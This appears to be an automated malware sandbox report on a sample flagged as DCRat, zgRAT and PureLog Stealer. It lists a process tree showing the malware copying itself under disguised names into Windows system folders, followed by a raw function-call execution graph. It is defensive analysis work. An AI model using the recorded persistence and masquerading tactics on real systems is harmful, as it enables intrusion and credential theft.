                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe"
                                                                                  Imagebase:0x70000
                                                                                  File size:147'456 bytes
                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"
                                                                                  Imagebase:0x4b0000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:00:43:03
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                                                                  Imagebase:0x7ff7bbe90000
                                                                                  File size:2'759'232 bytes
                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"
                                                                                  Imagebase:0x7ff7f4b50000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                                                                  Imagebase:0x7ff7bbe90000
                                                                                  File size:2'759'232 bytes
                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"
                                                                                  Imagebase:0x7ff7f4b50000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat"
                                                                                  Imagebase:0x7ff774390000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:chcp 65001
                                                                                  Imagebase:0x7ff661e30000
                                                                                  File size:14'848 bytes
                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:00:43:05
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                  Imagebase:0x7ff6e59b0000
                                                                                  File size:108'032 bytes
                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:00:43:11
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:false

                                                                                  Target ID:20
                                                                                  Start time:00:43:39
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                                                  Imagebase:0x940000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  Target ID:21
                                                                                  Start time:00:43:47
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Recovery\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Recovery\conhost.exe"
                                                                                  Imagebase:0xb20000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  Target ID:22
                                                                                  Start time:00:43:55
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                                                  Imagebase:0x130000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:true

                                                                                  Target ID:23
                                                                                  Start time:00:44:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                                                                  Imagebase:0xc30000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:24
                                                                                  Start time:00:44:28
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                                                                  Imagebase:0x170000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:25
                                                                                  Start time:00:44:37
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Recovery\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Recovery\conhost.exe"
                                                                                  Imagebase:0x660000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:26
                                                                                  Start time:00:44:45
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                                                                  Imagebase:0x210000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:20.9%
                                                                                    Total number of Nodes:1085
                                                                                    Total number of Limit Nodes:51
UnhandledExceptionFilter 41957->41958 41959 63ce8d 41958->41959 41960 64eb38 UnhandledExceptionFilter 41959->41960 41961 63ceb1 41960->41961 41961->41924 41963 64eb3d ___std_exception_copy 41962->41963 41965 64eb57 _com_raise_error 41963->41965 41972 657a5e UnhandledExceptionFilter CatchGuardHandler __dosmaperr 41963->41972 41965->41927 41967 644a80 __EH_prolog 41966->41967 41968 64eb38 UnhandledExceptionFilter 41967->41968 41969 644a9c 41968->41969 41970 637b8b 41969->41970 41973 640e46 23 API calls 41969->41973 41970->41929 41972->41963 41973->41970 41975 63828e __EH_prolog 41974->41975 42002 6313dc 41975->42002 41977 6382aa 41978 6382bb 41977->41978 42148 639f42 41977->42148 41981 6382f2 41978->41981 42010 631a04 41978->42010 42139 631692 41981->42139 41984 638389 42029 638430 41984->42029 41986 6383e8 42035 631f6d 41986->42035 41987 6383a3 41987->41986 42032 641b66 41987->42032 41990 6382ee 41990->41981 41990->41984 41993 63a56d 3 API calls 41990->41993 41991 6383f3 41991->41981 42039 633b2d 41991->42039 42051 63848e 41991->42051 41993->41990 41996 63a582 41995->41996 42000 63a5b0 41996->42000 42398 63a69b 41996->42398 41998 63a592 41999 63a597 FindClose 41998->41999 41998->42000 41999->42000 42000->41930 42001->41933 42003 6313e6 __EH_prolog 42002->42003 42004 63ce40 UnhandledExceptionFilter 42003->42004 42005 631419 42004->42005 42006 64eb38 UnhandledExceptionFilter 42005->42006 42008 631474 _abort 42005->42008 42007 631461 42006->42007 42007->42008 42152 63b505 42007->42152 42008->41977 42011 631a0e __EH_prolog 42010->42011 42023 631a61 42011->42023 42026 631b9b 42011->42026 42171 6313ba 42011->42171 42013 631bc7 42182 63138b 23 API calls 42013->42182 42016 633b2d 25 API calls 42020 631c12 42016->42020 42017 631bd4 42017->42016 42017->42026 42018 631c5a 42021 631c8d 42018->42021 42018->42026 42183 63138b 23 API calls 42018->42183 42020->42018 42022 633b2d 25 API calls 42020->42022 42021->42026 42027 639e80 24 API calls 42021->42027 42022->42020 42023->42013 
42023->42017 42023->42026 42024 633b2d 25 API calls 42025 631cde 42024->42025 42025->42024 42025->42026 42026->41990 42027->42025 42201 63cf3d 42029->42201 42031 638440 42031->41987 42209 64de6b 42032->42209 42036 631f77 __EH_prolog 42035->42036 42038 631fa6 42036->42038 42217 6319af 42036->42217 42038->41991 42040 633b39 42039->42040 42041 633b3d 42039->42041 42040->41991 42050 639e80 24 API calls 42041->42050 42042 633b4f 42043 633b6a 42042->42043 42044 633b78 42042->42044 42045 633baa 42043->42045 42326 6332f7 25 API calls 2 library calls 42043->42326 42327 63286b 25 API calls 3 library calls 42044->42327 42045->41991 42048 633b76 42048->42045 42328 6320d7 23 API calls 42048->42328 42050->42042 42052 638498 __EH_prolog 42051->42052 42057 6384d5 42052->42057 42070 638513 42052->42070 42351 648c8d 25 API calls 42052->42351 42054 6384f5 42055 6384fa 42054->42055 42056 63851c 42054->42056 42055->42070 42352 637a0d 35 API calls 42055->42352 42056->42070 42353 648c8d 25 API calls 42056->42353 42057->42054 42061 63857a 42057->42061 42057->42070 42061->42070 42329 635d1a 42061->42329 42062 638605 42062->42070 42335 638167 42062->42335 42065 638797 42066 63a56d 3 API calls 42065->42066 42067 638802 42065->42067 42066->42067 42341 637c0d 42067->42341 42069 63d051 23 API calls 42076 63885d 42069->42076 42070->41991 42071 63898b 42356 632021 23 API calls 42071->42356 42072 638a5f 42077 638ab6 42072->42077 42091 638a6a 42072->42091 42073 638992 42073->42072 42079 6389e1 42073->42079 42076->42069 42076->42070 42076->42071 42076->42073 42354 638117 24 API calls 42076->42354 42355 632021 23 API calls 42076->42355 42084 638a4c 42077->42084 42359 637fc0 32 API calls 42077->42359 42078 638ab4 42085 63959a 25 API calls 42078->42085 42081 638b14 42079->42081 42079->42084 42086 63a231 2 API calls 42079->42086 42080 639105 42083 63959a 25 API calls 42080->42083 42081->42080 42099 638b82 42081->42099 42360 6398bc 42081->42360 42083->42070 42084->42078 42084->42081 42085->42070 42087 
638a19 42086->42087 42087->42084 42357 6392a3 32 API calls 42087->42357 42089 63ab1a UnhandledExceptionFilter 42092 638bd1 42089->42092 42091->42078 42358 637db2 32 API calls 42091->42358 42093 63ab1a UnhandledExceptionFilter 42092->42093 42112 638be7 42093->42112 42097 638b70 42364 636e98 23 API calls 42097->42364 42099->42089 42100 638cbc 42101 638e40 42100->42101 42102 638d18 42100->42102 42105 638e52 42101->42105 42106 638e66 42101->42106 42125 638d49 42101->42125 42103 638d8a 42102->42103 42104 638d28 42102->42104 42110 638167 2 API calls 42103->42110 42107 638d6e 42104->42107 42114 638d37 42104->42114 42108 639215 27 API calls 42105->42108 42109 643377 26 API calls 42106->42109 42107->42125 42367 6377b8 33 API calls 42107->42367 42108->42125 42111 638e7f 42109->42111 42115 638dbd 42110->42115 42370 643020 27 API calls 42111->42370 42112->42100 42113 638c93 42112->42113 42119 63981a 24 API calls 42112->42119 42113->42100 42365 639a3c 26 API calls 42113->42365 42366 632021 23 API calls 42114->42366 42121 638de6 42115->42121 42122 638df5 42115->42122 42115->42125 42119->42113 42368 637542 27 API calls 42121->42368 42369 639155 28 API calls __EH_prolog 42122->42369 42128 638f85 42125->42128 42371 632021 23 API calls 42125->42371 42127 639090 42127->42080 42130 63a4ed SetFileAttributesW 42127->42130 42128->42080 42128->42127 42129 63903e 42128->42129 42347 639f09 SetEndOfFile 42128->42347 42348 639da2 42129->42348 42133 6390eb 42130->42133 42133->42080 42372 632021 23 API calls 42133->42372 42134 639085 42136 639620 24 API calls 42134->42136 42136->42127 42137 6390fb 42373 636dcb 23 API calls _wcschr 42137->42373 42140 6316a4 42139->42140 42389 63cee1 42140->42389 42149 639f59 42148->42149 42151 639f63 42149->42151 42397 636d0c 23 API calls 42149->42397 42151->41978 42153 63b50f __EH_prolog 42152->42153 42158 63f1d0 23 API calls 42153->42158 42155 63b521 42159 63b61e 42155->42159 42158->42155 42160 63b630 _abort 42159->42160 42163 6410dc 42160->42163 42166 64109e 
42163->42166 42167 6410b1 42166->42167 42170 4ff6859 NtQueryInformationProcess GetSystemInfo 42167->42170 42168 63b597 42168->42008 42170->42168 42184 631732 42171->42184 42173 6313d6 42174 639e80 42173->42174 42175 639e92 42174->42175 42176 639ea5 42174->42176 42177 639eb0 42175->42177 42199 636d5b 23 API calls 42175->42199 42176->42177 42179 639eb8 SetFilePointer 42176->42179 42177->42023 42179->42177 42180 639ed4 42179->42180 42180->42177 42200 636d5b 23 API calls 42180->42200 42182->42026 42183->42021 42185 631748 42184->42185 42194 6317a0 __InternalCxxFrameHandler 42184->42194 42186 631771 42185->42186 42195 636c36 23 API calls __vswprintf_c_l 42185->42195 42190 63178d ___std_exception_copy 42186->42190 42191 6317c7 42186->42191 42188 631767 42196 636ca7 23 API calls 42188->42196 42190->42194 42197 636ca7 23 API calls 42190->42197 42191->42194 42198 636ca7 23 API calls 42191->42198 42194->42173 42195->42188 42196->42186 42197->42194 42198->42194 42199->42176 42200->42177 42202 63cf4d 42201->42202 42204 63cf54 42201->42204 42205 63981a 42202->42205 42204->42031 42206 639833 42205->42206 42208 639e80 24 API calls 42206->42208 42207 639865 42207->42204 42208->42207 42210 64de78 42209->42210 42211 63e617 7 API calls 42210->42211 42212 64de9b 42211->42212 42213 634092 _swprintf 5 API calls 42212->42213 42214 64dead 42213->42214 42215 64d4d4 16 API calls 42214->42215 42216 641b7c 42215->42216 42216->41986 42218 6319bb 42217->42218 42219 6319bf 42217->42219 42218->42038 42221 6318f6 42219->42221 42222 631945 42221->42222 42223 631908 42221->42223 42229 633fa3 42222->42229 42224 633b2d 25 API calls 42223->42224 42227 631928 42224->42227 42227->42218 42230 633fac 42229->42230 42231 633b2d 25 API calls 42230->42231 42232 631966 42230->42232 42231->42230 42232->42227 42233 631e50 42232->42233 42234 631e5a __EH_prolog 42233->42234 42243 633bba 42234->42243 42236 631e84 42237 631732 23 API calls 42236->42237 42240 631f0b 42236->42240 42238 631e9b 42237->42238 42271 6318a9 
23 API calls 42238->42271 42240->42227 42241 631eb3 _wcslen 42272 6318a9 23 API calls 42241->42272 42244 633bc4 __EH_prolog 42243->42244 42245 633bf6 42244->42245 42246 633bda 42244->42246 42247 633e51 42245->42247 42251 633c22 42245->42251 42296 63138b 23 API calls 42246->42296 42311 63138b 23 API calls 42247->42311 42250 633be5 42250->42236 42251->42250 42273 643377 42251->42273 42253 633ca3 42254 633d2e 42253->42254 42270 633c9a 42253->42270 42299 63d051 42253->42299 42283 63ab1a 42254->42283 42255 633c9f 42255->42253 42298 6320bd 23 API calls 42255->42298 42257 633c71 42257->42253 42257->42255 42258 633c8f 42257->42258 42297 63138b 23 API calls 42258->42297 42262 633d41 42264 633dd7 42262->42264 42265 633dc7 42262->42265 42305 643020 27 API calls 42264->42305 42287 639215 42265->42287 42268 633dd5 42268->42270 42306 632021 23 API calls 42268->42306 42307 642297 42270->42307 42271->42241 42272->42240 42274 64338c 42273->42274 42276 643396 ___std_exception_copy 42273->42276 42312 636ca7 23 API calls 42274->42312 42277 64341c 42276->42277 42280 643440 _abort 42276->42280 42281 6434c6 _com_raise_error 42276->42281 42313 6432aa 26 API calls 3 library calls 42277->42313 42280->42257 42282 643524 42281->42282 42314 643106 26 API calls 42281->42314 42282->42257 42284 63ab28 42283->42284 42286 63ab32 42283->42286 42285 64eb38 UnhandledExceptionFilter 42284->42285 42285->42286 42286->42262 42288 63921f __EH_prolog 42287->42288 42289 6313ba 23 API calls 42288->42289 42290 639231 42289->42290 42315 63d114 42290->42315 42292 63928a 42292->42268 42294 63d114 26 API calls 42295 639243 42294->42295 42295->42292 42295->42294 42322 63d300 24 API calls __InternalCxxFrameHandler 42295->42322 42296->42250 42297->42270 42298->42253 42300 63d072 42299->42300 42301 63d084 42299->42301 42323 63603a 23 API calls 42300->42323 42324 63603a 23 API calls 42301->42324 42304 63d07c 42304->42254 42305->42268 42306->42270 42308 6422a1 42307->42308 42310 6422c1 42308->42310 42325 640eed 23 API 
calls 42308->42325 42311->42250 42312->42276 42313->42280 42314->42281 42319 63d12a __InternalCxxFrameHandler 42315->42319 42316 63d29a 42317 63d0cb 6 API calls 42316->42317 42320 63d291 42316->42320 42317->42320 42318 648c8d 25 API calls 42318->42319 42319->42316 42319->42318 42319->42320 42321 63ac05 23 API calls 42319->42321 42320->42295 42321->42319 42322->42295 42323->42304 42324->42304 42325->42310 42326->42048 42327->42048 42328->42045 42330 635d2a 42329->42330 42374 635c4b 42330->42374 42333 635d5d 42334 635d95 42333->42334 42379 63b1dc CharUpperW ___vcrt_FlsSetValue _wcslen 42333->42379 42334->42062 42336 638186 42335->42336 42337 638232 42336->42337 42386 63be5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 42336->42386 42385 641fac CharUpperW 42337->42385 42340 63823b 42340->42065 42342 637c22 42341->42342 42343 637c5a 42342->42343 42387 636e7a 23 API calls 42342->42387 42343->42076 42345 637c52 42388 63138b 23 API calls 42345->42388 42347->42129 42349 639db3 42348->42349 42350 639e3f SetFileTime 42349->42350 42350->42134 42351->42057 42352->42070 42353->42070 42354->42076 42355->42076 42356->42073 42357->42084 42358->42078 42359->42084 42361 638b5a 42360->42361 42362 6398c5 GetFileType 42360->42362 42361->42099 42363 632021 23 API calls 42361->42363 42362->42361 42363->42097 42364->42099 42365->42100 42366->42125 42367->42125 42368->42125 42369->42125 42370->42125 42371->42128 42372->42137 42373->42080 42380 635b48 42374->42380 42377 635c6c 42377->42333 42378 635b48 CharUpperW 42378->42377 42379->42333 42383 635b52 42380->42383 42381 635c3a 42381->42377 42381->42378 42383->42381 42384 63b1dc CharUpperW ___vcrt_FlsSetValue _wcslen 42383->42384 42384->42383 42385->42340 42386->42337 42387->42345 42388->42343 42393 63cef2 42389->42393 42391 63cf24 42396 63a99e 23 API calls 42391->42396 42395 63a99e 23 API calls 42393->42395 42394 63cf2f 42395->42391 42396->42394 42397->42151 42399 63a6a8 42398->42399 42400 63a6c1 FindFirstFileW 42399->42400 
